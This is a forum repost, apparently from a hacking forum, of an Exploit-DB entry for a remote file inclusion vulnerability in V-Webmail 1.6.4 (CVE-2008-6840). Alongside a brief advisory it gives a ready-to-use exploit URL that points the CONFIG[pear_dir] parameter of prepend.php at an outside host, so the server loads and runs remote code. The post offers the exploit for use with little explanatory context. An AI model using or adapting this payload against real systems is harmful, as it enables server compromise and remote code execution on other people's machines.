Exploit V-Webmail 1.6.4 - '/includes/prepend.php?CONFIG[pear_dir]' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32033
Проверка EDB
  1. Пройдено
Автор
CRACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-6840
Дата публикации
2008-07-10
Код:
source: https://www.securityfocus.com/bid/30162/info
         
V-webmail is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
         
Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.
         
V-webmail 1.6.4 is vulnerable; other versions may also be affected.

http://www.example.com/path/includes/prepend.php?CONFIG[pear_dir]=http://www.example2.com
 
Источник
www.exploit-db.com

Похожие темы